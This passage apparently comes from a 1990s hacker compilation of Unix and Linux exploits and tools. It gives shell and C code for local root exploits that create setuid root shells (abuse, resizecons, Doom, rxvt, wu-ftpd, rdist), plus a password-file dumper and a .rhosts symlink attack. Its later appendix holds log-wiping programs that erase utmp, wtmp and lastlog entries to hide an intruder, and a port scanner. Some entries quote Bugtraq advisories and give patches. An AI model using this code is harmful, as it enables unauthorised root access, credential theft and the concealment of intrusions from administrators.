.                                                                        .
..........................................................................

----------- cut here

 /*  This source will/should print out SHADOWPW passwd files.   */
 
 struct  SHADOWPW {				 /* see getpwent(3) */
	  char *pw_name;
	  char *pw_passwd;
	  int  pw_uid;
	  int  pw_gid;
	  int  pw_quota;
	  char *pw_comment;
	  char *pw_gecos;
	  char *pw_dir;
	  char *pw_shell;
 };
 struct passwd *getpwent(), *getpwuid(), *getpwnam();
 
 #ifdef   elxsis?
 
 /* Name of the shadow password file. Contains password and aging info */
 
 #define  SHADOWPW "/etc/shadowpw"
 #define  SHADOWPW_PAG "/etc/shadowpw.pag"
 #define  SHADOWPW_DIR "/etc/shadowpw.dir"
 /*
  *  Shadow password file pwd->pw_gecos field contains:
  *
  *  ,,,,
  *
  *  	 = Type of password criteria to enforce (type int).
  *		BSD_CRIT (0), normal BSD.
  *		STR_CRIT (1), strong passwords.
  *    = Password aging period (type long).
  *		0, no aging.
  *		else, number of seconds in aging period.
  *  	 = Time (seconds from epoch) of the last password
  *		change (type long).
  *		0, never changed.n
  *  	 = Time (seconds from epoch) that the current password
  *		was made the  (type long).
  *		0, never changed.ewromsinm
  *   = Password (encrypted) saved for an aging  to
  *		prevent reuse during that period (type char [20]).
  *		"*******", no .
  */
 
 /* number of tries to change an aged password */
 
 #define  CHANGE_TRIES 3
 
 /* program to execute to change passwords */
 
 #define  PASSWD_PROG "/bin/passwd"
 
 /* Name of the password aging exempt user names and max number of entires */
 
 #define  EXEMPTPW "/etc/exemptpw"
 #define MAX_EXEMPT 100
 
 /* Password criteria to enforce */
 
 #define BSD_CRIT 0	/* Normal BSD password criteria */
 #define STR_CRIT 1	 /* Strong password criteria */
 #define MAX_CRIT 1
 #endif   elxsi
 #define NULL 0
 main()
 {
	struct passwd *p;
	int i;
	for (;1;) {;
	  p=getpwent();
	  if (p==NULL) return;
	  printpw(p);
	}
 }
 
 printpw(a)
 struct SHADOWPW *a;
 {
	printf("%s:%s:%d:%d:%s:%s:%s\n",
	   a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid,
	   a->pw_gecos,a->pw_dir,a->pw_shell);
 }
 
 /* SunOS 5.0		/etc/shadow */
 /* SunOS4.1+c2     /etc/security/passwd.adjunct */
 
------------ cut here

..........................................................................
.                                                                        .
. 8. Abuse Root Exploit (linux game program)                             .
.                                                                        .
..........................................................................

---------- cut here

There is a security hole in RedHat 2.1, which installs the game abuse,
/usr/lib/games/abuse/abuse.console suid root.  The abuse.console program
loads its files without absolute path names, assuming the user is running
abuse from the /usr/lib/games/abuse directory.  One of these files in the
undrv program, which abuse executes as root.  If the user is not in the
abuse directory when running this, an arbitrary program can be substituted
for undrv, allowing the user to execute arbitrary commands as root. 
   If abuse.console needs to be run by users other than root at the console,
provisions need to be made in the code to not execute or load any files
as root.

                   Program: /usr/lib/games/abuse/abuse.console suid root
Affected Operating Systems: Red Hat 2.1 linux distribution
              Requirements: account on system
                     Patch: chmod -s /usr/lib/games/abuse/abuse.console
       Security Compromise: root
                    Author: Dave M. (davem@cmu.edu)
                  Synopsis: abuse.console runs undrv without an absolute
                            pathname while executing as root, allowing
                            a user to substitute the real undrv with 
                            an arbitrary program.

Exploit:
#!/bin/sh
#
# abuser.sh
# exploits a security hole in abuse to create
# a suid root shell /tmp/abuser on a linux
# Red Hat 2.1 system with the games package 
# installed.
#
# For release 2/2/96 - 1 drink credit please.
#
# by Dave M. (davem@cmu.edu)
#
echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/lib/games/abuse/abuse.console
then
echo ++++++++++++++++ System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/undrv
#!/bin/sh
/bin/cp /bin/sh /tmp/abuser
/bin/chmod 4777 /tmp/abuser
_EOF_
cat << _EOF_ >> /tmp/the_wall
so ya thought ya might like to go to the show
to feel the warm thrill of confusion that space cadet glow
tell me is something eluding you sunshine?
is this not what you expected to see?
if you wanna find out what's behind these cold eyes
you'll just have to claw your way through this disguise
_EOF_
chmod +x /tmp/undrv
PATH=/tmp
echo ================ Executing Abuse
/usr/lib/games/abuse/abuse.console
/bin/rm /tmp/undrv
/bin/rm /tmp/the_wall
if test -u /tmp/abuser
then
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser
else
echo ---------------- Exploit failed
fi
else
echo ---------------- This machine does not appear to be vulnerable.
fi
----------- cut here

..........................................................................
.                                                                        .
. 9. Doom (game) root exploit - makes suid root shell                    .
.                                                                        .
..........................................................................


----------- Start reading
From bo@ebony.iaehv.nl Tue Dec 17 18:53:18 1996
Date: Tue, 17 Dec 1996 10:18:24 +0100
From: Bo 
To: Multiple recipients of list BUGTRAQ 
Subject: Re: Linux: killmouse/doom

> From: Joe Zbiciak 
> Subject:      Re: Linux: exploit for killmouse.
>
> Which reminds me, there's a bigger hole in Doom.  It doesn't drop its
> root permissions soon enough!  The user is allowed to set a sound server
> in his/her .doomrc.  Normally, this is set to "sndserver".  Howver, this
> can be set to *any* program, and that program runs as root!!

Yes,  very true. And just in case anybody collects these scripts, here's
the obvious one:

------------ CUT HERE --------------
#!/bin/sh
# Tue Dec 17 10:02:20 MET 1996 Bo
echo 'sndserver "/tmp/sndserver"' > .doomrc
cat > /tmp/sndserver.c << EOF
#include 
#include 
main() {
        if (fork()) while (getc(stdin));
        else system("cp /bin/sh /tmp; chmod +s /tmp/sh");
                /* or whatever you like to do */
}
EOF
gcc /tmp/sndserver.c -o /tmp/sndserver

------------ CUT HERE --------------

The  fork()  is  just so that doom runs on nicely without locking up the
keyboard  and  sndserver  gobbles  up all the sound data send to it. Run
the script, start sdoom, quit the normal way, and execute /tmp/sh.

Thanks for pointing it out, Joe.

Regards,
                Bo.

--
                "Heisenberg may have been here".

--------------- end of read

..........................................................................
.                                                                        .
. 10. dosmenu suid root exploit                                          .
.                                                                        .
..........................................................................


--------- read

In Debian 1.1, the optional DOSEMU package installs /usr/sbin/dos
setuid root.  This is a serious security hole which can be exploited
to gain access to any file on the system.

Package: dosemu
Version: 0.64.0.2-9

------- start of cut text --------------

$ cat /etc/debian_version 
1.1
$ id
uid=xxxx(quinlan) gid=xxxx(quinlan) groups=xxxx(quinlan),20(dialout),24(cdrom)
[quinlan:~]$ ls -al /usr/bin/dos
-rwsr-xr-x   1 root     root       569576 Oct 24 00:05 /usr/bin/dos
$ ls -al /root/foo
-rw-------   1 root     root         1117 Nov 13 23:10 /root/foo
$ dos -F /root/foo
[ Prints /root/foo, which is not readable by user `quinlan'. ]

------- Cut here

I expect there may be other holes in dosemu other than this one that
can be exploited if it is installed setuid root.  It took about 60
seconds to find this hole once I realized /usr/bin/dos was setuid
root.

Dan

Note: This security hole can be corrected by removing the suid bit from
/usr/bin/dos:
----------------------------
$ chmod u-s /usr/bin/dos
----------------------------

Jonathan

----------- end of read

..........................................................................
.                                                                        .
. 11. Doom root killmouse exploit                                        .
.                                                                        .
..........................................................................

System:
Probably  Linux  specific.  Slackware  3.0 (installs Linux 1.2.13) which
have  gpm  utility  and/or  the  Doom  package installed are vulnerable.
Other distributions might be too.

Impact:
Local users can acquire root status.

Background:
The  problem  is  the  killmouse/startmouse command that is part of Doom
package  on  Linux  systems.  It  is  actually a C-wrapper that runs two
scripts  (killmouse.sh/startmouse.sh). It runs suid root.

Problem:
I would try to describe the problem but I can't stop laughing.

Exploit:
This  can  be  exploited  in  a few similar ways. Here's just one. Let's
assume  the  gpm  utility is not running. We can't start it up ourselves
as gpm is only to be run by root. So we'll use startmouse to fire it up:

$ touch /tmp/gpmkilled
$ /usr/games/doom/startmouse

ps -aux | grep gpm
bo        1436  0.0  2.0   40  312 v03 R    16:33   0:00 grep gpm
root      1407  0.0  2.4   42  368  ?  S    16:24   0:00 /usr/bin/gpm t ms

Fine,  it's  running.  Now  we'll use killmouse to kill the process, but
first we set our umask to 0 and link /tmp/gpmkilled to /root/.rhosts:

$ umask 0
$ ln -s /root/.rhosts /tmp/gpmkilled
$ /usr/games/doom/killmouse
 1407  ?  S     0:00 gpm t ms

$ ls -l /root/.rhosts
-rw-rw-rw-   1 root     users           0 Dec 13 16:44 /root/.rhosts

$ echo localhost bo > /root/.rhosts
$ rsh -l root localhost sh -i
bash#

Bingo.  On  some  systems gpm might not be started in /etc/rc.d/rc.local
so  the  startmouse  script will fail. But gpm might be running already.
If  neither of these conditions are met, note that startmouse.sh creates
/tmp/gpmscript  and runs it in a shell. There's a window of time between
creating  the  script and executing it, so we have a nice race condition
here; it can be replaced with anything you like prior to execution.

Solution:
Remove  setuid  bits  of  killmouse/startmouse.  Better yet - nuke them.
While your at it, nuke Doom too - it's a stupid game anyway :-)

Best regards,
                Bo (bo@ebony.iaehv.nl)


killmouse exploit
------------------ cut here

/usr/games/doom/startmouse.sh:
#!/bin/sh
if [ -r /tmp/gpmkilled ]; then
  /usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
  /bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled
fi

/usr/games/doom/killmouse.sh:
#!/bin/sh
if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
  GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled
fi

----------- cut here

..........................................................................
.                                                                        .
. 12. Root exploit for resize icons                                      .
.                                                                        .
..........................................................................

There is a security hole in RedHat 2.1, which installs the program
/usr/bin/resizecons suid root.  The resizecons program allows a user
to change the videmode of the console.  During this process, it runs
the program restoretextmode without an absolute pathname, assuming the
correct version will be found in the path, while running with root
privileges.  It then executes setfont in the same manner.  By setting
the path to find a rogue restoretextmode, a user can execute an arbitrary
program as root.

As a more amusing aside, the file /tmp/selection.pid is read and the
pid contained within is sent a SIGWINCH, allowing a user on the system
to force a redraw of the screen to an arbitrary process (that handles 
SIGWINCH calls) on the machine. 

If /usr/bin/resizecons needs to be run by users other than root at the
console, provisions need to be made in the code to execute the outside
utilities with absolute pathnames, and to check access rights on files
before opening.

                   Program: /usr/bin/resizecons
Affected Operating Systems: Red Hat 2.1 linux distribution
              Requirements: account on system
           Temporary Patch: chmod -s /usr/bin/resizecons
       Security Compromise: root
                    Author: Dave M. (davem@cmu.edu)
                  Synopsis: resizecons runs restoretextmode without an
                            absolute pathname while executing as root,
                            allowing a user to substitute the real
                            program with arbitrary commands.


----------cut here
wozzeck.sh:
#!/bin/sh
#
# wozzeck.sh
# exploits a security hole in /usr/bin/resizecons 
# to create a suid root shell in /tmp/wozz on a 
# linux Red Hat 2.1 system.
#
# by Dave M. (davem@cmu.edu)
# 
echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/bin/resizecons
then
echo ++++++++++++++++ System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/313x37
This exploit is dedicated to 
Wozz.  Use it with care.
_EOF_
cat << _EOF_ > /tmp/restoretextmode
#!/bin/sh
/bin/cp /bin/sh /tmp/wozz
/bin/chmod 4777 /tmp/wozz
_EOF_
/bin/chmod +x /tmp/restoretextmode
PATH=/tmp
echo ================ Executing resizecons
/usr/bin/resizecons 313x37
/bin/rm /tmp/restoretextmode
/bin/rm /tmp/313x37
if test -u /tmp/wozz
then
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
else
echo ---------------- Exploit failed
fi
else
echo ---------------- This machine does not appear to be vulnerable.
fi

-------------- cut here

..........................................................................
.                                                                        .
. 13. Root console exploit for restorefont                               .
.                                                                        .
..........................................................................

Linux 'restorefont' Security Holes
by FEH Staff

Linux's svgalib utilities, required to be suid root, have a problem in that
they do not revoke suid permissions before reading a file.  This is exploited
in the restorefont utility, but similar bugs exist in other svgalib utilities.
The restorefont utility serves two functions.  First, it will read a font from
a file and write it to the console as the font.  Second, it will read a font
from the console and write it out to a file.  Luckily, the specific bug
in restorefont can only be exploited if someone is at the console, reducing
its overall impact on the security of the system as a whole.

In writing the utilities, the authors are cognizant of the fact that when
writing out the font, suid permissions must first be given up; it is in fact
commented as such in the code.  However, when reading in a font, the program
is still running with full suid root permissions.  This allows us to read in
any file for the font that root could access (basically, anything).

The applicable code to read in the file is shown below:

#define FONT_SIZE 8192
unsigned char font[FONT_SIZE];

	if (argv[1][1] == 'r') {
		FILE *f;
		f = fopen(argv[2], "rb");
		if (f == NULL) {
			error:
			perror("restorefont");
			exit(1);
		}
		if(1!=fread(font, FONT_SIZE, 1, f))
			{
			if(errno)
				goto error;
			puts("restorefont: input file corrupted.");
			exit(1);
			}
		fclose(f);

We can see from this that the file to be read in has to be at least 8k,
as if it is not, the program will produce an error and exit.  If the file
is at least 8k, the first 8k are read into the buffer, and the program 
proceeds to set whatever the contents of the file are to the font:
	vga_disabledriverreport();
	vga_setchipset(VGA);		/* avoid SVGA detection */
	vga_init();
	vga_setmode(G640x350x16);
	vga_puttextfont(font);
	vga_setmode(TEXT);

At this point, the console will now look quite unreadable if you are
reading something other than a font from that file.  But, the data that
is put into the font is left untouched and is readable using the -w option
of restorefont.  We then read the font back from video memory to a new file,
and our job is complete, we have read the first 8k of a file we shouldn't
have had access to.  To prevent detection of having run this, we probably
shouldn't leave an unreadable font on the screen, so we save and then restore
the original font before reading from the file.
The complete exploit is shown below:

                   Program: restorefont, a svgalib utility
Affected Operating Systems: linux
              Requirements: logged in at console
       Security Compromise: user can read first 8k of any file of at least
                            8k in size on local filesystems
                  Synopsis: restorefont reads a font file while suid root,
                            writing it to video memory as the current vga
                            font; anyone at console can read the current
                            font to a file, allowing you to use video memory
                            as an 8k file buffer.

-------------
rfbug.sh:
--------------------cut here
#!/bin/sh
restorefont -w /tmp/deffont.tmp
restorefont -r $1
restorefont -w $2
restorefont -r /tmp/deffont.tmp
rm -f /tmp/deffont.tmp
-----------------------------------cut here

..........................................................................
.                                                                        .
. 14. Root rxvt X server exploit                                         .
.                                                                        .
..........................................................................

Program: rxvt
Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
                            rxvt suid root (and compiled with PRINT_PIPE)
              Requirements: account on system, X server
           Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
       Security Compromise: root
                    Author: Dave M. (davem@cmu.edu)
                  Synopsis: rxvt fails to give up root privileges before
                            opening a pipe to a program that can be specified
                            by the user.


Exploit:
1.  Set DISPLAY environment variable if necessary so you can use x clients.
2.  In user shell:
    $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
    $ chmod +x /tmp/rxbug
    $ rxvt -print-pipe /tmp/rxbug
3.  In rxvt xclient:
    $ cat
      ESC[5i
      ESC[4i
    (The client will close at this point with a broken pipe)
4.  $ /tmp/rxsh
    # whoami
    root
    #

..........................................................................
.                                                                        .
.15. Root wuftpd exploit                                                 .
..........................................................................

The following is gleaned from the BugTraq mailing list:
-------------------------------------------------------
Since Bugtraq is exceptionally quiet lately, I though I should make it
come alive again with this discussion of the bug that was reported in
the wu.ftpd that comes with some Slackware distributions of Linux.
The report was just before Bugtraq went down for a long time, but
I've found the bug still to be present on all the Linux machines that
I have access to. So maybe it needs to be brought a little more in
the open. Here we go:

ObBug: - Short description of the bug

It involves wu.ftpd being misconfigured at compile time and allowing
SITE EXEC access to /bin (for anonymous or otherwise chroot-ed users
this is ~ftp/bin). Now if in this /bin resides a program that gives
access to executables outside /bin, but in the users reach (such as
/bin/bash that gives access to the user's homedir), this opens up
a root vulnerability. This should have been set to /bin/ftp-exec and
which be set by the _PATH_EXECPATH variable in src/pathnames.h before
compiling. The wu-ftpd-2.4_linux.tgz that I found somewhere on the
net has this securely set as default value.

- How to check ?

$ ftp -n localhost
user: 
password: 
ftp> quote site exec bash -c id

If vulnerable it gives here: uid=0, gid=0, euid=, egid=

Of course, bash should not be available at all

- How to exploit (in case your sysadmin or you think the above is not
  a problem)

go to your homedir and make a program: duh.c (or whatever)

main() {
   seteuid(0);
   setegid(0);
   system("/bin/cp /bin/sh ./sh");
   system("/bin/chmod 6755 ./sh");
}

$ make duh
$ ftp -n localhost (and login)
user: 
password: 
ftp> quote site exec bash -c duh
ftp> quit

$ ./sh

bash#

(voila, QED)

- How to fix?

Get the source of wu-ftpd-2.4.linux.tar.gz (stock wu-ftpd-2.4 from wuarchive
doesn't compile on linux) and compile it; you might want to define the
_PATH_PIDNAMES and _PATH_XFERLOG to other values there...(/usr/adm/ftp.pids-%s
and /usr/adm/xferlog for example). If you cannot find that I can email the
source to you,...if you trust the source I took somewhere unmodified and
if you trust me ;-) An arch search for wu-ftpd-2.4 will give you sites too.
I can remember that I got it that way.

$) Henri Karrenbeld
-----------------------------------------------------------------------------
Hardware, n.:
        The parts of a computer system that can be kicked.
-----------------------------------------------------------------------------

..........................................................................
.                                                                        .
. 16. A shell script called gimme, used to read any system file          .
..........................................................................

----------------cut here
#! /bin/sh
# GIMME - "gimme' a file"
# Demonstrate rdist's ability to give me permission to access anything.
#
# gimme  [ []]
#        is the target file.
#        is the octal mode to which the file access permission
#               should be set.  Note that this may not be effective unless
#               either the SUID (4000) or SGID (2000) bits are also requested.
#        is the target directory for rdist to use if a hard
#               link is desired.  Note that the user must have permission
#               to create this directory, it must be on the same filesystem
#               as the target file, and the target file must not be a
#               directory.  This option is necessary to change the ownership
#               of the target if chown() of a symbolic link modifies the
#               link itself, and not the file it refers to.
#

dirname=gimme$$
deftemp=/tmp
defperm=6777

if [ $1x = x ]; then
        echo "Usage: $0  [ []]" >&2
        exit 1
fi

if [ $2x != x ]; then
        perm=$2
else
        perm=$defperm
fi

if [ $3x != x ]; then
        link="ln"
        temp=$3/$dirname
        target=$1
else
        link="ln -s"
        temp=$deftemp/$dirname
        case $1 in
        /*)
                target=$1
                ;;
        *)
                target=`pwd`/$1
                ;;
        esac
fi

trap "rm -fr $temp; exit 1"  1 2 15
umask 66
mkdir $temp; if [ $? != 0 ]; then
        exit 1
fi

set `whoami` $LOGNAME
user=$1
set daemon `groups`
while [ $# != 1 ]; do
        shift
done
group=$1

(
        echo "t$temp/something"
        echo "R0 $perm 1 0 $user $group "

        while [ ! -f $temp/rdist* ]; do
                sleep 1
        done

        set $temp/rdist*
        rm -f $1
        if $link $target $1 >&2; then
                echo "" | dd bs=3 conv=sync 2>/dev/null
                echo ""

                echo 0 > $temp/status
        else
                echo 1 > $temp/status
        fi

        exit
) | rdist -Server

status=`cat $temp/status`
rm -fr $temp
exit $status
-----------------------------cut here



*********************************************
* Appendix IV - Other UNIX system utilities *
*********************************************


..........................................................................
.                                                                        .
. 1. Cloak v1.0 Wipes your presence on SCO, BSD, Ultrix, and HP/UX UNIX  .
..........................................................................


------------------ cut here

/* UNIX Cloak v1.0 (alpha)  Written by: Wintermute of -Resist- */
/* This file totally wipes all presence of you on a UNIX system*/
/* It works on SCO, BSD, Ultrix, HP/UX, and anything else that */
/* is compatible..  This file is for information purposes ONLY!*/

/*--> Begin source...    */
#include 
#include 
#include 
#include 
#include 

main(argc, argv)
    int     argc;
    char    *argv[];
{
    char    *name;
    struct utmp u;
    struct lastlog l;
    int     fd;
    int     i = 0;
    int     done = 0;
    int     size;

    if (argc != 1) {
         if (argc >= 1 && strcmp(argv[1], "cloakme") == 0) {
	     printf("You are now cloaked\n");
	     goto start;
                                                           }
         else {
	      printf("close successful\n");
	      exit(0);
	      }
		   }
    else {
	 printf("usage: close [file to close]\n");
	 exit(1);
	 }
start:
    name = (char *)(ttyname(0)+5);
    size = sizeof(struct utmp);

    fd = open("/etc/utmp", O_RDWR);
    if (fd < 0)
	perror("/etc/utmp");
    else {
	while ((read(fd, &u, size) == size) && !done) {
	    if (!strcmp(u.ut_line, name)) {
		done = 1;
		memset(&u, 0, size);
		lseek(fd, -1*size, SEEK_CUR);
		write(fd, &u, size);
		close(fd);
	    }
	}
    }


    size = sizeof(struct lastlog);
    fd = open("/var/adm/lastlog", O_RDWR);
    if (fd < 0)
	perror("/var/adm/lastlog");
    else {
	lseek(fd, size*getuid(), SEEK_SET);
	read(fd, &l, size);
	l.ll_time = 0;
	strncpy(l.ll_line, "ttyq2 ", 5);
	gethostname(l.ll_host, 16);
	lseek(fd, size*getuid(), SEEK_SET);
	close(fd);
    }
}
---------------cut here

.............................................................................
.                                                                           .
. 2. invisible.c  Makes you invisible, and works on some SunOS without root .
.............................................................................


----------- cut here
/* invisible.c - a quick hack courtesy of the rogue */
/* erases your presence when root, or partially erases when on a sun and not root */
/* peace, dudes */


#include 
#include 
#include 
#include 
#include 

main(argc, argv)
    int     argc;
    char    *argv[];
{
    char    *name;
    struct utmp u;
    struct lastlog l;
    int     fd;
    int     i = 0;
    int     done = 0;
    int     size;

    name = (char *)(ttyname(0)+5);
    size = sizeof(struct utmp);
    
    fd = open("/etc/utmp", O_RDWR);
    if (fd < 0)
	perror("/etc/utmp");
    else {
	while ((read(fd, &u, size) == size) && !done) {
	    if (!strcmp(u.ut_line, name)) {
		done = 1;
		memset(&u, 0, size);
		lseek(fd, -1*size, SEEK_CUR);
		write(fd, &u, size);
		close(fd);
	    }
	}
    }
    memset(&u, 0, size);
    fd = open("/var/adm/wtmp", O_RDWR | O_TRUNC);
    if (fd < 0)
	perror("/var/adm/wtmp");
    else {
	u.ut_time = 0;
	strcpy(u.ut_line, "~");
	strcpy(u.ut_name, "shutdown");
	write(fd, &u, size);
	strcpy(u.ut_name, "reboot");
	write(fd, &u, size);
	close(fd);
    }


    size = sizeof(struct lastlog);
    fd = open("/var/adm/lastlog", O_RDWR);
    if (fd < 0)
	perror("/var/adm/lastlog");
    else {
	lseek(fd, size*getuid(), SEEK_SET);
	read(fd, &l, size);
	l.ll_time = 0;
	strncpy(l.ll_line, "ttyq2 ", 5);
	gethostname(l.ll_host, 16);
	lseek(fd, size*getuid(), SEEK_SET);
	write(fd, &l, size);
	close(fd);
    }
    
}
----------- cut here

..........................................................................
.                                                                        .
. 3. SySV Program that makes you invisible                               .
..........................................................................


--------- cut here

/* MME - MakeME, Version 1.00 for SySV / Source Compatible machines   
         MME will allow you to remove yerself from the UTMP file, change
         what name appears for you in UTMP, or change what TTY you appear
         to be on.

If you modify this program or incorporate some of these routines into
another program, please somewhere in the program tell where you got
them from.. namely, put in some credits to me & This program , so
you don't "playgerize".  It makes me mad when someone modifies someone
else's work then pawns it off as their own original piece.  The credits
can even be in a comment somewhere in the source instead of visual to
the user. 

syntax:
mme
mme login_name
mme login_name new_tty

in order to change tty name, you must first supply a login name
then a ttyname.

You MUST have write perm's to /etc/utmp to modify the main utmp file.
*/

#include 
#include 
#include 
#include 
#include 

char *mytty; /* For an exact match of ut_line */
char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak";
struct utmp *user;

main(argc,argv)
int argc;
char *argv[];
{
        int good= 0,cnt = 0,start = 1,cn = 0, cl = 0,index = 0;
        char err[80];
        if (argc >= 2) cn = 1;
        if (argc == 3) cl = 1;
        system(backup_utmp);
    printf("Welcome to MME 1.00 By Sir Hackalot\n");
    printf("Another PHAZESOFT Productions\n");
    printf("Status:");
    if (cn == 1) printf("Changing your login to %s\n",argv[1]);
        if (cl == 1) printf("Changing your tty   to %s\n",argv[2]);
        if (cl == 0 && cn == 0) printf("Removing you from utmp\n");
        utmpname("/etc/utmp");

/* The Below Section finds OUR entry, even if more than 1 of the same name
   of us is logged on.  It finds YOUR tty, looks in utmp until it finds
   your tty, then "cnt" holds your index number */
        
        mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */
        strcpy(mytty,++mytty); /* Make a string starting one pos greater */
        while (good != 1) {
                user = getutent();
                cnt++;
                if (strcmp(user->ut_line,mytty) == 0) good =1;
        }
        utmpname("/etc/utmp"); /* Reset file pointer */
        for(start = 0;start < cnt;start++) {
                user = getutent(); /* Move the file pointer to where we are */
        }

        /* Below: If we did not supply a command line arg to change name, etc,
          make us invisible from WHO.  WHO only displays USER_PROCESS 
          types, as does "w", "whodo" and all who variations.  You WILL
          be seen if they do who -l (or one some systems -L)
          if we did supply an argument make SURE we DO show up. */

        if (argc == 1)  user->ut_type = LOGIN_PROCESS; /* Become invisible */
        else user->ut_type = USER_PROCESS;

        /* ABove: You can change it to:
         else {
         user->ut_type = LOGIN_PROCESS;
         strcpy(user->ut_name,"LOGIN");
         }
          to totally hide your-self.  On some systems, if you do it, it will go
          thru the login process... But that is rare.  AT any-rate, for 
          safety, i left out the strcpy */

        /* Below: If we entered a new login name, change to that.
          If we entered a new tty, change to that. */

        if (argc == 2) strcpy(user->ut_name,argv[1]);
        if (argc == 3) strcpy(user->ut_line,argv[2]);
        pututline(user); /* Rewrite our new info */
        endutent(); /* Tell the utmp functions we are through */
        printf("Delete /tmp/utmp.bak if all is well. Else, copy it to /etc/utmp\n");
}

----------- cut here

.........................................................................
.                                                                       .
. 4. UNIX Port scanner                                                  .
.........................................................................


----------- cut here

/* 
 * internet port scanner 
 *
 * This program will scan a hosts TCP ports printing all ports that accept
 * connections, and if known, the service name.
 * This program can be trivially altered to do UDP ports also.
 *
 * Kopywrong (K) Aug. 25, '94 pluvius@io.org
 *
 * Hey kiddies, this is a C program, to run it do this:
 * $ cc -o pscan pscan.c
 * $ pscan  [max port]
 *
 * No, this will not get you root.
 * 
 * Changes:
 * Changed fprintf to printf in line 34 to work with my Linux 1.1.18 box
 * Netrunner 1/18/95 11:30pm
 * 
*/
static char sccsid[] = "@(#)pscan.c     1.0     (KRAD) 08/25/94";
#include 
#include 
#include 
#include 
#include 

#define MAX_PORT 1024 /* scan up to this port */
int s;
struct sockaddr_in addr;
char rmt_host[100];

int skan(port)
int port;
{
 int r;
    s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s < 0) {
       /* fprintf("ERROR: socket() failed\n"); */
       /* Changed to printf for my Linux 1.1.18 box */
       printf("ERROR: socket() failed\n");
       exit(0);
    }

    addr.sin_family = PF_INET;
    addr.sin_port = port;
    addr.sin_addr.s_addr = inet_addr(rmt_host);

    r = connect(s,(struct sockaddr *) &addr, sizeof(addr));

    close(s);

    if (r < 0) {
       return (1 == 0);
    }

    return (1 == 1);
}

main(argc,argv) 
int argc;
char *argv[];
{
 int a,b,c,d,e,f;
 struct hostent *foo;
 struct servent *bar;

   if (argc < 2) {
      fprintf(stderr,"usage: %s  [highest port]\n",argv[0]);
      exit(0);
   }

   if (sscanf(argv[1],"%d.%d.%d.%d",&a,&b,&c,&d) != 4) {
      foo = gethostbyname(argv[1]);
      if (foo == NULL) {
         fprintf(stderr,"error: cannot resolve host %s\n",argv[1]);
         exit(0);
      }
      sprintf(rmt_host,"%d.%d.%d.%d",(unsigned char )foo->h_addr_list[0][0],
              (unsigned char ) foo->h_addr_list[0][1], 
              (unsigned char ) foo->h_addr_list[0][2], 
              (unsigned char ) foo->h_addr_list[0][3]);
   } else {
      strncpy(rmt_host,argv[1],99);
   }


   if (argc > 2) {
      f = atoi(argv[2]);
   } else
      f = MAX_PORT;

   fprintf(stdout,"Scanning host %s - TCP ports 1 through %d\n",rmt_host,f);

   for (e =1;e<=f;e++) {
    char serv[100];
      if (skan(e)) {
         bar = getservbyport(e,"tcp");
         printf("%d (%s) is running.\n",e,(bar == NULL) ? "UNKNOWN" :
                bar->s_name);
      }
   }
}

------------ cut here

.........................................................................
.                                                                       .
.  5. Remove wtmp entries by tty number or username                     .
.........................................................................


---------- cut here


/* This program removes wtmp entries by name or tty number */

#include 
#include 
#include 
#include 

void usage(name)
char *name;
{
    printf("Usage: %s [ user | tty ]\n", name);
    exit(1);
}

void main (argc, argv)
int argc;
char *argv[];
{
    struct utmp utmp;
    int size, fd, lastone = 0;
    int match, tty = 0, x = 0;

    if (argc>3 || argc<2)
       usage(argv[0]);

    if (strlen(argv[1])<2) {
       printf("Error: Length of user\n");
       exit(1);
    }

    if (argc==3)
       if (argv[2][0] == 'l') lastone = 1;

    if (!strncmp(argv[1],"tty",3))
       tty++;

    if ((fd = open("/usr/adm/wtmp",O_RDWR))==-1) {
        printf("Error: Open on /usr/adm/wtmp\n");
        exit(1);
    }

    printf("[Searching for %s]:  ", argv[1]);

    if (fd >= 0)
    {
       size = read(fd, &utmp, sizeof(struct utmp));
       while ( size == sizeof(struct utmp) )
       {
          if ( tty ? ( !strcmp(utmp.ut_line, argv[1]) ) :
            ( !strncmp(utmp.ut_name, argv[1], strlen(argv[1])) ) &&
              lastone != 1)
          {
             if (x==10)
                printf("\b%d", x);
             else
             if (x>9 && x!=10)
                printf("\b\b%d", x);
             else
                printf("\b%d", x);
             lseek( fd, -sizeof(struct utmp), L_INCR );
             bzero( &utmp, sizeof(struct utmp) );
             write( fd, &utmp, sizeof(struct utmp) );
             x++;
          }
          size = read( fd, &utmp, sizeof(struct utmp) );
       }
    }
    if (!x)
       printf("No entries found.");
    else
       printf(" entries removed.");
    printf("\n");
    close(fd);
}

------------- cut here

............................................................................
.                                                                          .
.  6. SunOS wtmp editor                                                    .
............................................................................


---------- cut here

/*
   /var/adm/wtmp editor for Sun's
   Written by gab, this will make a file wtmp.tmp then just copy
   it over /var/adm/wtmp and chmod 644 it
*/
 
#include 
#include 
#include 
main(argc,argv)
int argc;
char *argv[];
{
int fp=-1,fd=-1;
struct utmp ut;
int i=0;
char name[8];
if (argc!=2) { fprintf(stderr,"usage: %s accountname\n\r",argv[0]);  exit(2);}
strcpy(name,argv[1]);
if (fp=open("/var/adm/wtmp",O_RDONLY)) {
        fd=open("wtmp.tmp",O_WRONLY|O_CREAT);
        while (read(fp,&ut,sizeof(struct utmp))==sizeof(struct utmp)) {
                if (strncmp(ut.ut_name,name,strlen(name))) write(fd,&ut,sizeof(struct utmp));
                i++;
        }
        close(fp);
        close(fd);
        }
printf("Total: %d\n\r", i);
}
------------ cut here

.......................................................................
.                                                                     .
.  7. SunOS 4+ Zap your self from wtmp, utmp and lastlog              .
.......................................................................


-------------  cut here

/*
